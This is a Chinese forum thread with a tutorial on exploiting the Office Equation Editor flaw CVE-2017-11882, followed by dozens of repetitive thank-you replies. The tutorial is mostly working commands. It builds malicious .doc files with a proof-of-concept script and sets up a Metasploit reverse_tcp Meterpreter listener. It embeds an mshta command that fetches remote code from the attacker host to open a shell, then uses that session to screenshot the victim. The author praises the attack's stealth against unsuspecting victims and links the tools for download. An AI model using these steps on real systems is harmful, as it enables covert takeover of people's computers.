8资源分享论坛 - 资源分享,资源共享|www.8ziyuan.com

标题: CVE-2017-11882 通杀所有office版本 [打印本页]

作者: 唐章小小    时间: 2019-6-9 22:46
标题: CVE-2017-11882 通杀所有office版本
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

1、漏洞概述
这几个月来,针对微软Office套件最火热最流行的攻击手段,莫过于基于CVE-2017-11882的漏洞利用。
2017年11月14号,微软推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。各路大神在Twitter和Github上相继公布自己的POC及对应的漏洞利用姿势,将这股烈火蔓延到2018年。
为什么这个漏洞会引起这么大的关注度呢?
从漏洞利用效果来看,它可以通杀Office 2003到2016的所有版本,并且整个攻击环境的构建非常简单,姿势又非常“优雅”。例如,有些攻击效果会出现弹框,会出现CPU飙高,会发生异常等等,而这个漏洞的利用效果,堪称“无色无味”。在后续实验过程中,大家可以自行体会。
更重要的是,这枚“通杀型”的Office高危漏洞,其实已经潜伏了17年之久,直到近几个月才被发现并低调修复……
那么,这个漏洞是怎么回事呢?简单来说:
此漏洞是由Office软件里面的 [公式编辑器] 造成的,由于编辑器进程没有对名称长度进行校验,导致缓冲区溢出,攻击者通过构造特殊的字符,可以实现任意代码执行。
举个例子,如果黑客利用这个漏洞,构造带有shell后门的office文件,当普通用户打开这个office文件,则电脑可以被黑客直接控制。
影响版本:
office 2003
office 2007
office 2010
office 2013
office 2016
2、漏洞复现环境
Kali Linux 2017.03 + Windows 7 + Office 2016
渗透机:Kali Linux + POC代码
靶机:Win7 + Office 2016
注:为了节省大家实验时间,我将此实验涉及到的工具全部上传到网盘。
链接:https://pan.baidu.com/s/17rrYP33Nv2-dNxS7wc1foA  密码:nbw2
3、实验流程
①下载office 2016
直接上msdn.itellyou.cn下载office 2016
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
种子链接:cn_office_professional_plus_2016_x86_x64_dvd_6969182.iso (2.41 GB)


②安装office 2016
在Win7靶机中,安装office 2016套件,这里需要一些时间,大家也可以用其他windows和office版本来测试。
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

③下载POC代码
Github上有很多大神分享针对这个漏洞的POC代码,但测试过程中,发现有些验证效果不出来,有些验证过程太复杂。
建议大家直接将我网盘分享的CVE-2017-11882文件夹下载下来,放到Kali Linux渗透机桌面。如下:
[attach]36133[/attach]
④进入shell终端,使用POC代码生成特殊改造的word文件
进入POC代码目录
root@kali:~/Desktop# cd CVE-2017-11882
查看文件
root@kali:~/Desktop/CVE-2017-11882# ls
生成word文档11882.doc,打开doc文件之后,会弹出计算器(以此验证offce漏洞)
root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o 11882.doc
生成word文档11882.doc,打开doc文件之后,会弹出任务管理器(以此验证offce漏洞)
root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "cmd.exe /c taskmgr.exe" -o 11882-2.doc
再次查看,可以看到多了两个doc文件
root@kali:~/Desktop/CVE-2017-11882# ls
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
⑤将文件拷贝到Win7靶机上,并验证效果
[attach]36135[/attach]
使用Word 2016打开第一个文件-11882.doc文件,查看效果:
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
使用Word 2016打开第二个文件-11882-2.doc文件,查看效果:
[attach]36137[/attach]
可以看到,由于Office2016存在CVE-2017-11882漏洞,当打开特殊构造的word文件时,windows会执行其他动作。既然此漏洞能够造成win系统执行其他动作,那么,是否顺便可以反弹会话,直接被渗透机控制呢?答案是肯定的。接下来我们来做进一步的验证。

⑥在Kali Linux上构造带有shell后门的word文件,并开启监听
首先,为了后续更好的管理和使用渗透代码,可以将网盘中下载的代码”shell.rb”,名称修改为“cve-2017-11886.rb”
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
将CVE-2017-11882.rb拷贝到metasploit目录中,这里拷贝到目录/usr/share/metasploit-framework/modules/exploits/windows/smb
root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/windows/smb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cp ~/Desktop/CVE-2017-11882/CVE-2017-11882.rb CVE-2017-11882.rb
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# ls

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

进入Metasploit框架,搜索CVE-2017-11882:
root@kali:~# msfconsole
msf > search CVE-2017-11882

watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
使用CVE-2017-11882.rb模块,开启Meterpreter监听会话:
使用模块
msf > use exploit/windows/smb/CVE-2017-11882
设置tcp反弹会话
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
设置渗透机ip地址(这里通过ifconfig命令查看)
msf exploit(CVE-2017-11882) > set lhost 172.16.70.216
设置路径为11882,可自定义
msf exploit(CVE-2017-11882) > set uripath 11882
开启渗透,进入监听状态
msf exploit(CVE-2017-11882) > exploit
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

使用CVE-2017-11882.py模块,生成带有shell的doc文件:
root@kali:~/Desktop/CVE-2017-11882# python CVE-2017-11882.py -c "mshta http://172.16.70.216:8080/11882" -o 11882-3.doc
此时,CVE-2017-11882目录中增加了另外一个word文件11882-3,而此文件的功能便是:打开它的电脑会反弹shell会话到控制机
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

将文件11882-3.doc拷贝到靶机win7上面:
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

在Win7打开11882-3.doc文件,此时观察Win7靶机和Kali Linux渗透机
注:做这个实验之前,首先要求渗透机Kali Linux和靶机Win7能够联通,例如在我的虚拟环境中,Kali Linux的ip地址是172.16.70.216,而Win7的地址是172.16.70.144,两个虚拟机采用NAT网卡模式。
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
当靶机打开文件时,整个过程没有任何弹框,也没有其他异常动作,整个攻击效果非常“优雅”,肉鸡很难发现。
此时,在另一段的Kali Linux渗透机,已经获取到shell会话。
[attach]36145[/attach]
通过命令sessions查看meterpreter会话:
msf exploit(CVE-2017-11882) > sessions
watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=

此后便可以通过meterpreter来对会话进行管理:
进入会话
msf exploit(CVE-2017-11882) > sessions 1
查看系统信息
meterpreter > sysinfo
查看当前用户
meterpreter > getuid
截屏
meterpreter > screenshot
[attach]36147[/attach]
[attach]36148[/attach]

可以看到,安装了最新office 2016版本的win7,因为CVE-2017-11882漏洞,当打开带有shell后门的doc文件时,kali渗透机可以获取到完美的后门并控制win7。
4、漏洞修复
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

=====================


作者: 铷裹鰅見妳    时间: 2019-6-9 22:52
谢谢楼主的分享~~收藏了~~!
作者: 沵魡管眞寬♂    时间: 2019-6-10 13:49
谢谢楼主的分享~~收藏了~~!
作者: 竹排江中游    时间: 2019-6-10 22:27
谢谢楼主的分享~~收藏了~~!
作者: 无条件、投降    时间: 2019-6-11 07:07
太赞了!!!LZ!!!!
作者: 灵魂—堕落者    时间: 2019-6-11 16:05
谢谢楼主的分享~~收藏了~~!
作者: 只剩淡漠    时间: 2019-6-12 01:03
金币不够了回复有金币吗
作者: 残花可以败柳    时间: 2019-6-12 11:40
强烈感谢
作者: 泪不肯走    时间: 2019-6-12 21:39
感谢你的分享,论坛有你更加的精彩
作者: 伴凯终老    时间: 2019-6-13 09:15
感谢分享
作者: 随他吧    时间: 2019-6-13 19:32
好资源终于找到了<<CVE-2017-11882 通杀所有office版本>>
作者: 〃獨白式分手    时间: 2019-6-14 13:55
太赞了!!!LZ!!!!
作者: 冒牌货    时间: 2019-6-14 23:00
金币不够了回复有金币吗
作者: 满栀    时间: 2019-6-15 07:57
感谢分享啊:aixin:
作者: 无灵魂游走    时间: 2019-6-16 02:08
谢谢楼主的分享~~收藏了~~!
作者: 为爱搁浅心脏    时间: 2019-6-16 10:35
前排支持 感谢分享
作者: 酱汁儿肉    时间: 2019-6-16 18:13
666,这个可以支持!
作者: 颓废ヤ心碎ゞ    时间: 2019-6-17 02:38
十分感谢
作者: 爱⌒轻易说出口    时间: 2019-6-17 10:21
多谢分享
作者: 烟久    时间: 2019-6-17 17:49
<<CVE-2017-11882 通杀所有office版本>>
作者: Penniless    时间: 2019-6-18 01:38
找了好久终于找到了
作者: 雨下的樱花★    时间: 2019-6-18 09:32
多谢分享
作者: 梦想永遠在騷動    时间: 2019-6-18 18:28
谢谢楼主分享
作者: 你太碍眼    时间: 2019-6-19 02:28
好资源终于找到了<<CVE-2017-11882 通杀所有office版本>>
作者: 失心疯╰╮    时间: 2019-6-19 09:03
感谢分享
作者: 恐惧散播器┾♂    时间: 2019-6-19 15:34
感谢分享
作者: 寒裳    时间: 2019-6-20 16:09
资源可用!谢谢分享!
作者: 呼吸    时间: 2019-6-21 00:25
多谢,谢谢楼主。
作者: 螎在ぺ長風裏    时间: 2019-6-21 09:13
资源可用!谢谢分享!
作者: 带他滚    时间: 2019-6-22 14:53
多谢分享
作者: 朱砂印    时间: 2019-6-22 23:29
十分感谢
作者: 沙漠里的鱼    时间: 2019-6-23 07:11
十分感谢
作者: 活著就是折騰    时间: 2019-6-23 14:36
谢谢楼主分享
作者: oぃ輸在喜欢妳    时间: 2019-6-24 01:45
强烈感谢
作者: 晚眉妆    时间: 2019-6-24 01:49
强烈感谢
作者: 話柠    时间: 2019-6-24 02:31
太赞了!!!LZ!!!!
作者: 温入骨    时间: 2019-6-24 02:39
多谢,谢谢楼主。
作者: 木兮木    时间: 2019-6-24 03:00
感谢分享
作者: 可原    时间: 2019-6-24 03:07
感谢分享啊:aixin:
作者: 梦回千年    时间: 2019-6-24 03:14
666,这个可以支持!
作者: 梵以姑娘i    时间: 2019-6-24 03:28
前排支持 感谢分享
作者: 殇夜ο斤风    时间: 2019-6-24 03:32
谢谢楼主分享
作者: 苝海莈冇猫    时间: 2019-6-24 03:35
多谢分享
作者: 眼角下的眼泪※    时间: 2019-6-24 04:05
多谢,谢谢楼主。
作者: 死挣扎!    时间: 2019-6-24 04:12
666,这个可以支持!
作者: ﹊zんí筆抒情﹏    时间: 2019-6-24 04:54
强烈感谢
作者: 仦精灵    时间: 2019-6-24 05:27
十分感谢
作者: 粢醍    时间: 2019-6-24 06:52
感谢你的分享,论坛有你更加的精彩
作者: 偏执的温柔    时间: 2019-6-24 07:25
前排支持 感谢分享
作者: 巷弄    时间: 2019-6-24 07:36
太赞了!!!LZ!!!!
作者: 腥气    时间: 2019-6-24 07:58
强烈感谢
作者: 花龄残伤丶    时间: 2019-6-24 08:49
感谢分享
作者: 让痛无所    时间: 2019-6-24 09:00
多谢,谢谢楼主。
作者: 祭奠‘这羁绊    时间: 2019-6-24 11:53
感谢分享啊:aixin:
作者: 烟花易冷红颜薄    时间: 2019-6-24 12:38
找了好久终于找到了
作者: 二次元的妹子    时间: 2019-6-24 12:42
感谢分享啊:aixin:
作者: -葬心葬爱°    时间: 2019-6-24 12:54
<<CVE-2017-11882 通杀所有office版本>>
作者: 限量版女汉子i    时间: 2019-6-24 13:47
多谢分享
作者: 脆弱让人放纵    时间: 2019-6-24 14:21
<<CVE-2017-11882 通杀所有office版本>>
作者: 相许    时间: 2019-6-24 14:38
十分感谢
作者: 泪点是你    时间: 2019-6-24 15:19
强烈感谢
作者: 投君怀抱里    时间: 2019-6-24 15:33
感谢分享啊:aixin:
作者: 作践自己    时间: 2019-6-24 15:44
找了好久终于找到了
作者: ◆沧桑    时间: 2019-6-24 19:36
<<CVE-2017-11882 通杀所有office版本>>
作者: 寂寞、变堕落    时间: 2019-6-24 19:47
感谢你的分享,论坛有你更加的精彩




欢迎光临 8资源分享论坛 - 资源分享,资源共享|www.8ziyuan.com (https://www.8ziyuan.com/) Powered by Discuz! X3.4